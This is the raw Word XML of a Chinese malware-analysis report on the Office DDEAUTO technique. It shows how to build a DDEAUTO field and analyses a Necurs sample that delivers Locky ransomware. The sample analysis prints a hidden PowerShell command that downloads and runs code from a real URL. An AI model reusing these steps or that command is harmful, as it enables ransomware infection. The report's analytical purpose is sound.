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808A" w14:textId="540E9CF7" w:rsidR="00FF2BF4" w:rsidRPr="004F7781" w:rsidRDefault="004F7781">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>背景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8963B" w14:textId="2188AA47" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>过去几年，基于宏的文档攻击技术一直是主流，虽然需要用户主动进行确认，但是攻击的成功率依然非常的高。不过，近段时间来，使用Office DDEAUTO技术来传播恶意文件的方法已经越来越流行。该技术很快被FIN7组织、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Necurs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>僵尸网络所采用，用来进行APT攻击，以及用来传播勒索病毒。该方法已经开始替代了用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>宏技术</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>来传播，成为当前使用office为载体传播病毒的新宠。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F91886" w14:textId="31B81F6D" w:rsidR="004F7781" w:rsidRPr="004F7781" w:rsidRDefault="004F7781">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DE</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>技术介绍：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A74D5" w14:textId="508330CC" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:t>Windows提供了应用程序</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>间数据</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>传输的若干种方法。其中一种就是使用动态数据交换（DDE）协议。DDE协议是一套消息和指示的集合。通过发送消息以及共享内存实现应用程序的数据共享和交换。应用程序可以使用DDE协议实现一次性数据传输以及持续的数据交换（当新数据可用时，应用程序发送更新通知给另一个应用程序）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E40996" w14:textId="4686D5CD" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC4ED51" w14:textId="753B91BF" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:t>新建一个Word文档，通过Ctrl+F9添加一个域，然后修改域代码为：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>{ DDEAUTO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c:\windows\system32\cmd.exe “/k notepad.exe” }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09533225" w14:textId="1577A41B" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B92D299" wp14:editId="2C06A1BD">
            <wp:extent cx="5274310" cy="2671041"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="http://image.3001.net/images/20171027/15090760578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3001.net/images/20171027/150907605780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C038" w14:textId="77777777" w:rsidR="004F7781" w:rsidRDefault="004F7781" w:rsidP="004F7781">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:t>DDEAUTO表明是一个自动更新的DDE，后面跟的是可执行文件的路径，然后</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>””</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>里面表明可执行文件的参数，保存文档。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3EE30E" w14:textId="77777777" w:rsidR="004F7781" w:rsidRDefault="004F7781" w:rsidP="004F7781">
      <w:pPr>
        <w:pStyle w:val="a5"/>
      </w:pPr>
      <w:r>
        <w:t>也可以修改DDEAUTO为DDE，然后需要用WinRAR打开doc文档word/settings.xml，嵌入代码：&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>w:updateFields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> w:val=”true”/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DF6E7C" w14:textId="1966F8AC" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F510A24" wp14:editId="150C4F97">
            <wp:extent cx="5274310" cy="2715367"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="4" name="图片 4" descr="http://image.3001.net/images/20171027/15090760784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3001.net/images/20171027/1509076078448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A8FF5" wp14:editId="27C3B0EB">
            <wp:extent cx="5274310" cy="871482"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="6" name="图片 6" descr="http://image.3001.net/images/20171027/15090760926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3001.net/images/20171027/150907609267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9509" w14:textId="5F641410" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:t>执行样本后弹出记事本程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D628AC6" w14:textId="382F385F" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17355FA7" wp14:editId="33FAD0F6">
            <wp:extent cx="5274310" cy="2375103"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="2" name="图片 2" descr="http://image.3001.net/images/20171027/1509076104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3001.net/images/20171027/15090761044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6789" w14:textId="3E2342CB" w:rsidR="004F7781" w:rsidRPr="004F7781" w:rsidRDefault="004F7781">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>样本分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF8AB3" w14:textId="77777777" w:rsidR="004F7781" w:rsidRDefault="004F7781" w:rsidP="004F7781">
      <w:r>
        <w:t>样本名：DC00035305.doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678D801" w14:textId="77777777" w:rsidR="004F7781" w:rsidRDefault="004F7781" w:rsidP="004F7781">
      <w:r>
        <w:t>样本MD5：FD5D0801D9470908090DCD36AE88E96C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15039C8C" w14:textId="469955D7" w:rsidR="004F7781" w:rsidRDefault="004F7781" w:rsidP="004F7781">
      <w:r>
        <w:t>该样本是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Necurs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>僵尸网络发送的恶意邮件里的附件，用来传播</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>locky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>系列勒索病毒。主要分析下DDE的启动过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EEEAD" w14:textId="7B5CE3C4" w:rsidR="004F7781" w:rsidRDefault="004F7781" w:rsidP="004F7781">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行样本后，首先会弹出两个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风险提示的对话框。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359AD881" w14:textId="1D9A7198" w:rsidR="004F7781" w:rsidRPr="004F7781" w:rsidRDefault="004F7781" w:rsidP="004F77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9985F1" wp14:editId="1B8072CE">
            <wp:extent cx="4295775" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://image.3001.net/images/20171027/15090761229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3001.net/images/20171027/150907612292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B1D2A" wp14:editId="25D12454">
            <wp:extent cx="5274310" cy="885304"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="http://image.3001.net/images/20171027/15090761323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3001.net/images/20171027/150907613234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3A57" w14:textId="25CEDFA9" w:rsidR="004F7781" w:rsidRDefault="004F7781">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都点“是”按钮后，winword.</w:t>
      </w:r>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会启动cmd</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一次来执行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命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="523F1359" wp14:editId="0B21CBBB">
            <wp:extent cx="5274310" cy="392192"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="7" name="图片 7" descr="http://image.3001.net/images/20171027/15090761435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3001.net/images/20171027/150907614350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0A19" w14:textId="60016F7C" w:rsidR="00610CBF" w:rsidRDefault="00610CBF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31455C42" w14:textId="77777777" w:rsidR="00610CBF" w:rsidRPr="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610C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0CBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610CB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610CBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NoP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610CB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610CBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610CB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610CBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NonI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610CBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w hidden $e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00610CBF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610CBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>New-Object System.Net.WebClient).DownloadString('</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00610C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http://pdj.co.id/hjergf76</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00610CBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>');powershell -e $e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ED36CA" w14:textId="77777777" w:rsidR="00610CBF" w:rsidRDefault="00610CBF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载回来的文件为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>locky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系列敲诈者病毒，运行后会加密文档文件，并要求支付0</w:t>
      </w:r>
      <w:r>
        <w:t>.25</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比特币以进行</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321ED478" w14:textId="6C5B9236" w:rsidR="00610CBF" w:rsidRDefault="00610CBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D5DB892" wp14:editId="191F7F15">
            <wp:extent cx="5274310" cy="2989923"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="9" name="图片 9" descr="http://image.3001.net/images/20171027/15090761595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3001.net/images/20171027/150907615958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0F9D" w14:textId="52B5A18C" w:rsidR="00610CBF" w:rsidRDefault="00610CBF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看该样本，发现样本是恶意利用了DDE协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D036867" w14:textId="34E17902" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:r>
        <w:t>在DOC文件中发现一段文字，通过右键该段文字其实是一段域代码，并且从代码中发现了powershell.exe的参数，证明该DOC是利用了DDE协议传播恶意代码文件 ：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EC0A8F" w14:textId="34187C5A" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BD3AE83" wp14:editId="4C27CF7A">
            <wp:extent cx="3457575" cy="3152775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10" name="图片 10" descr="http://image.3001.net/images/20171027/15090761751114.png!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3001.net/images/20171027/15090761751114.png!sma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611D" w14:textId="04B30F8C" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6060B7B1" wp14:editId="765DB9EF">
            <wp:extent cx="5274310" cy="1007979"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="11" name="图片 11" descr="http://image.3001.net/images/20171027/1509076188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3001.net/images/20171027/150907618832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1BF0" w14:textId="7BE8D98F" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00610CBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDEAUTO原理分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEF3691" w14:textId="58EFB386" w:rsidR="00610CBF" w:rsidRPr="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CB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610CBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会将DDEAUTO的三个字段参数放入全局原子表用于进程间共享字符串数据，这意味着DDEAUTO的三个字段不能超过2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15079F75" w14:textId="4D38DF0A" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0723C222" wp14:editId="66F12C2E">
            <wp:extent cx="5274310" cy="3826849"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="12" name="图片 12" descr="http://image.3001.net/images/20171027/15090762016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3001.net/images/20171027/1509076201696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65EA" w14:textId="76D4599D" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00610CBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00610CBF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00610CBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在全局变量中存在一个结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，该结构（4字节一个成员）第一个成员存储了MSWord窗口的HWND，第二个成员用于存储DDE交互的窗口HWND，并且初始化为0，通过下图的函数获取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EE1A2" w14:textId="7B1F1AA8" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CB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11CCE6" wp14:editId="39AEB594">
            <wp:extent cx="2686050" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="http://image.3001.net/images/20171027/1509076235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.3001.net/images/20171027/150907623558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7C1B" w14:textId="24AC4313" w:rsidR="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:pPr>
        <w:pStyle w:val="3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 w:rsidRPr="00610CBF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="00610CB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接着程序会调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00610CB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SendMessageTimeoutW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00610CB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发送广播消息WM_DDE_INITIATE到电脑上运行的程序的所有顶级窗口，每个窗口将被给予1000ms时间以响应此DDE启动消息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F95EA58" w14:textId="04FB9130" w:rsidR="00610CBF" w:rsidRPr="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:pPr>
        <w:pStyle w:val="3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FED81E" wp14:editId="77698DA6">
            <wp:extent cx="5274310" cy="4690904"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="http://image.3001.net/images/20171027/1509076247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.3001.net/images/20171027/150907624744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EEB9" w14:textId="77777777" w:rsidR="0036204E" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:pPr>
        <w:pStyle w:val="3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Cs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="003620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如果正在运行的程序响应DDE启动请求，则会发送WM_DDE_ACK应答MSWord</w:t>
      </w:r>
      <w:r w:rsidRPr="0036204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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AE4A81" w14:textId="7B5DC9A6" w:rsidR="00610CBF" w:rsidRPr="00610CBF" w:rsidRDefault="00610CBF" w:rsidP="00610CBF">
      <w:pPr>
        <w:pStyle w:val="3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</w:pPr>
      <w:r w:rsidRPr="003620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然后MSWord更新储存DDE信息结构的第二个成员的数据为应答窗口的HWND，后续WM_DDE_ACK就会响应WM_DDE_TERMINATE消息，在MSDN中描述DDE请求的目标进程应该已经运行，此处就开始走MSDN描述的流程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E97BD" w14:textId="60C59AEC" w:rsidR="00610CBF" w:rsidRDefault="0036204E" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21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Pr="0036204E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>假设目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进程没有运行，根据MSDN的描述，此处应该提示用户目标进程未执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5473F" w14:textId="4A51526A" w:rsidR="0036204E" w:rsidRDefault="0036204E" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然而在实际代码中，如果DDE没有收到目标进程应答，会从全局原子中读取出字符串拼接，然后由MSWord创建一个新进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3799C" w14:textId="1CEB8A2B" w:rsidR="0036204E" w:rsidRDefault="0036204E" w:rsidP="00610CBF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3EF6F80" wp14:editId="3E59FA7E">
            <wp:extent cx="5274310" cy="4308458"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="http://image.3001.net/images/20171027/15090762669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.3001.net/images/20171027/1509076266977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57A9" w14:textId="19F08EEF" w:rsidR="0036204E" w:rsidRDefault="0036204E" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E766C4" wp14:editId="14B90B3B">
            <wp:extent cx="5274310" cy="3060228"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="16" name="图片 16" descr="http://image.3001.net/images/20171027/15090762806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.3001.net/images/20171027/1509076280666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18A7" w14:textId="5E744071" w:rsidR="0036204E" w:rsidRDefault="0036204E" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD91A59" w14:textId="149EFA02" w:rsidR="0036204E" w:rsidRDefault="0036204E" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0036204E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="0036204E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0036204E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后函数通过调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CreateProcessW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建一个新的进程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9E037" w14:textId="0E1BE8BF" w:rsidR="0036204E" w:rsidRDefault="0036204E" w:rsidP="00610CB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6B939" wp14:editId="229B62CF">
            <wp:extent cx="5274310" cy="2523903"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17" name="图片 17" descr="Office DDEAUTO技术分析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ffice DDEAUTO技术分析报告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A367" w14:textId="6898B29C" w:rsidR="00913CD6" w:rsidRDefault="00913CD6" w:rsidP="00610CBF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由此分析发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，这是一个DDE上的WWLIB实现错误，应该要求用户自己启动目标进程，而不是自动启动目标进程。</w:t>
      </w:r>
    </w:p>
